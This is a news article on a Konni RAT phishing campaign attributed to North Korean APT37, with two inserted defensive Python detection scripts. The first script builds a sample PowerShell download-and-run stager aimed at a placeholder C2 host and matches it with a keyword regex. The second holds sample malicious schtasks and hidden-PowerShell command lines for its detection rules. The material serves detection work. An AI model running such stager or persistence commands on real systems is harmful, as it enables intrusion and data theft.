Hackers from North Korea use Konni RAT malware to attack targets in the EU

Threat researchers have discovered a fresh campaign that is being carried out by the North Korean hacking group APT37 and is aimed at high-value organizations in the Czech Republic, Poland, and other nations in Europe.

A remote access trojan (RAT) known as Konni, which can establish persistence and perform host privilege escalation, is the malware the hackers are using in this campaign.

Konni has been linked to North Korean cyberattacks since 2014, and was most recently used in a spear-phishing attempt against the Russian Ministry of Foreign Affairs.

Researchers at Securonix have been tracking and analyzing the most recent, still-active campaign, which they have dubbed STIFF#BIZON. Its tactics and methodology match the operational sophistication expected of an advanced persistent threat (APT).

The STIFF#BIZON campaign

The attack starts with a phishing email carrying an archive attachment that contains a Word document (missile.docx) and a Windows shortcut file (_weapons.doc.lnk.lnk).

When the LNK file is opened, it runs code that searches the DOCX file for a base64-encoded PowerShell script; that script establishes a command-and-control (C2) connection and downloads two more files, weapons.doc and wp.vbs.

The downloaded document is a decoy that appears to be a report by Russian war correspondent Olga Bozheva. While the victim reads it, the VBS file runs silently in the background and creates a scheduled task on the host.
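The lure described above has two file-level tells that a mail gateway or analyst can check before anything executes: a genuine shortcut hiding behind a document extension, and a DOCX that carries a base64-encoded PowerShell script. The triage script below is an added example written for this page, not code from Securonix or from the campaign itself; the archive it inspects is constructed inline (a minimal DOCX with a base64 stager in document.xml and a shortcut header with the campaign's double-extension name), and the PowerShell marker list and the 64-character base64 threshold are assumptions chosen for illustration.

```python
"""Triage an e-mail attachment archive for the STIFF#BIZON-style lure:
a Windows shortcut masquerading as a document and a DOCX that embeds a
base64-encoded PowerShell script. Added example; constructed input only."""
import base64
import binascii
import io
import re
import zipfile

# A genuine Windows shortcut starts with HeaderSize 0x4C followed by the
# ShellLink CLSID 00021401-0000-0000-C000-000000000046 (little-endian GUID).
LNK_MAGIC = bytes.fromhex("4C000000" "0114020000000000C000000000000046")
DOC_EXTS = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".rtf", ".txt")
# Tokens that make a decoded blob look like PowerShell (assumed list).
PS_MARKERS = re.compile(
    rb"(?i)(powershell|invoke-expression|\biex\b|downloadstring|downloadfile|"
    rb"net\.webclient|invoke-webrequest|frombase64string|start-process)"
)
# Runs of base64 alphabet long enough to be worth decoding (assumed threshold).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def is_masquerading_lnk(name, data):
    """True when a member is a real shortcut whose name hides .lnk behind a document extension."""
    base = name.lower()
    if not base.endswith(".lnk"):
        return False
    while base.endswith(".lnk"):          # handles _weapons.doc.lnk.lnk
        base = base[:-4]
    return base.endswith(DOC_EXTS) and data.startswith(LNK_MAGIC)


def find_powershell_blobs(data):
    """Return (offset, decoded_text) for base64 runs that decode to PowerShell-looking text.
    Each blob is checked as UTF-8 and as UTF-16LE, the encoding -EncodedCommand expects."""
    hits = []
    for m in B64_RUN.finditer(data):
        core = m.group(0).rstrip(b"=")
        core = core[: len(core) - len(core) % 4]   # drop a partial trailing group
        try:
            raw = base64.b64decode(core, validate=True)
        except (binascii.Error, ValueError):
            continue
        candidates = [raw]
        try:
            candidates.append(raw.decode("utf-16-le").encode("utf-8"))
        except UnicodeDecodeError:
            pass
        for text in candidates:
            if PS_MARKERS.search(text):
                hits.append((m.start(), text))
                break
    return hits


def triage_archive(archive_bytes):
    """Walk a ZIP attachment and report masquerading LNKs and documents embedding PowerShell."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            if is_masquerading_lnk(info.filename, data):
                findings.append(("masquerading_lnk", info.filename))
            if info.filename.lower().endswith((".docx", ".doc")):
                blobs = find_powershell_blobs(data)          # raw bytes, e.g. data appended after the ZIP
                if zipfile.is_zipfile(io.BytesIO(data)):     # a DOCX is itself a ZIP: scan its parts too
                    with zipfile.ZipFile(io.BytesIO(data)) as inner:
                        for part in inner.namelist():
                            blobs += find_powershell_blobs(inner.read(part))
                if blobs:
                    findings.append(("embedded_powershell", info.filename))
    return findings


def build_sample_archive():
    """Constructed test input (not the real attachment): a minimal DOCX whose
    document.xml holds a UTF-16LE base64 stager, plus a fake LNK header under
    the campaign's double-extension file name. The C2 URL is a placeholder."""
    stager = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/wp.vbs')"
    blob = base64.b64encode(stager.encode("utf-16-le")).decode()
    docx = io.BytesIO()
    with zipfile.ZipFile(docx, "w") as d:
        d.writestr("[Content_Types].xml", "<Types/>")
        d.writestr("word/document.xml", f"<w:document><w:t>{blob}</w:t></w:document>")
    lnk = LNK_MAGIC + b"\x00" * 60        # header stub is enough for the magic check
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("missile.docx", docx.getvalue())
        z.writestr("_weapons.doc.lnk.lnk", lnk)
    return outer.getvalue()


if __name__ == "__main__":
    for kind, member in triage_archive(build_sample_archive()):
        print(f"{kind}: {member}")
```

The magic-bytes check matters more than the file name: renaming the shortcut to `.doc.lnk.lnk` defeats extension filters, but the ShellLink header cannot be changed without breaking the shortcut. The UTF-16LE decode is what catches an `-EncodedCommand` payload, which decodes to bytes interleaved with NULs and would not match the markers as UTF-8.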

At this point the attacker has already loaded the RAT and established a channel for exchanging data, so they are able to carry out the following operations:

Use the Win32 GDI API to take screenshots, then export them in GZIP format.

Extract the encryption key from the browser's Local State file to decrypt its cookie databases, which lets the attacker replay authenticated sessions and so get around MFA.

Get the victim’s saved login information from their web browsers.

Start a remote interactive shell that polls for and executes commands every 10 seconds.

In the fourth stage of the attack, as depicted in the diagram below, the hackers download additional files that support the modified Konni sample, retrieving them as compressed .cab archives.

These include DLLs that replace legitimate Windows service libraries, such as wpcsvc in System32, a technique used to run commands with higher privileges on the host.
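Each stage of the chain leaves a distinct trace in endpoint telemetry: PowerShell spawned by Explorer with an Office document on its command line (the shortcut pulling the script out of the DOCX), a script host creating a scheduled task (the VBS persistence step), and a DLL landing in System32 from something other than Windows servicing (the stage-four service-library swap). The detector below is an added example written for this page, not Securonix's rules or the campaign's code; it runs over Sysmon-style process-creation (event 1) and file-creation (event 11) records that are constructed inline and reduced to the fields the rules need. The command lines, the `wpcsvc.dll` file name and the list of trusted System32 writers are assumptions.

```python
"""Endpoint-telemetry rules for the three observable stages of the chain:
LNK -> PowerShell reading the DOCX, VBS -> scheduled task, CAB -> DLL in System32.
Added example over constructed Sysmon-style events; not real campaign logs."""
import ntpath
import re

OFFICE_DOC = re.compile(r"\.(docx?|rtf)\b")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Processes that legitimately write DLLs into System32 (assumed allow-list; tune per estate).
TRUSTED_SYSTEM32_WRITERS = {"trustedinstaller.exe", "tiworker.exe", "msiexec.exe", "poqexec.exe"}


def _base(path):
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path or "").lower()


def rule_lnk_powershell_docx(ev):
    """PowerShell started by Explorer (a double-clicked shortcut) whose command
    line names an Office document: the stage where the LNK searches the DOCX."""
    if ev.get("id") != 1 or _base(ev.get("image")) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if _base(ev.get("parent")) != "explorer.exe":
        return None
    if OFFICE_DOC.search(ev.get("cmdline", "").lower()):
        return "powershell from explorer referencing an Office document"
    return None


def rule_script_host_schtasks(ev):
    """schtasks.exe /create spawned by a script host: the VBS persistence stage.
    A VBS that uses the Schedule.Service COM object never spawns schtasks.exe,
    so pair this with Security event 4698 (scheduled task created)."""
    if ev.get("id") != 1 or _base(ev.get("image")) != "schtasks.exe":
        return None
    if _base(ev.get("parent")) in SCRIPT_HOSTS and "/create" in ev.get("cmdline", "").lower():
        return "scheduled task created by a script host"
    return None


def rule_system32_dll_drop(ev):
    """A DLL written into System32 by anything other than Windows servicing:
    the stage-four replacement of a service library such as wpcsvc."""
    if ev.get("id") != 11:
        return None
    target = (ev.get("target") or "").lower()
    if not (target.startswith("c:\\windows\\system32\\") and target.endswith(".dll")):
        return None
    writer = _base(ev.get("image"))
    if writer in TRUSTED_SYSTEM32_WRITERS:
        return None
    return f"DLL dropped into System32 by {writer}"


RULES = (rule_lnk_powershell_docx, rule_script_host_schtasks, rule_system32_dll_drop)


def detect(events):
    """Run every rule over every event; return (event index, rule name, reason) triples."""
    alerts = []
    for i, ev in enumerate(events):
        for rule in RULES:
            reason = rule(ev)
            if reason:
                alerts.append((i, rule.__name__, reason))
    return alerts


# Constructed sample telemetry: the three malicious stages interleaved with
# benign activity that must stay silent. Paths and command lines are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "Get-Content .\missile.docx"'},
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"wscript.exe //B C:\Users\u\AppData\Local\Temp\wp.vbs"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 10 /tn "Update" /tr "wscript.exe wp.vbs"'},
    {"id": 11, "image": r"C:\Windows\System32\expand.exe", "target": r"C:\Windows\System32\wpcsvc.dll"},
    {"id": 11, "image": r"C:\Windows\servicing\TrustedInstaller.exe", "target": r"C:\Windows\System32\kernel32.dll"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "schtasks.exe /query"},
]

if __name__ == "__main__":
    for idx, name, reason in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}: {reason}")
```

The third rule is deliberately an allow-list on the writing process rather than a deny-list on file names: the page only names wpcsvc, and a DLL-swap toolkit can target any service library, so alerting on the unusual writer (here expand.exe, the built-in .cab extractor) generalises to the technique rather than to one sample.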

Possible links to APT28

Securonix stresses that, even though the methods and toolkit point to APT37, APT28 (also known as FancyBear) may well be the group behind the STIFF#BIZON campaign.

According to the report’s conclusion, “There appears to be a direct correlation between IP addresses, hosting provider, and hostnames between this attack and historical data we have previously seen from FancyBear/APT28.”

The likelihood of misattribution in this instance is high since state-sponsored threat groups sometimes try to imitate the TTPs of other expert APTs to hide their tracks and trick threat analysts.
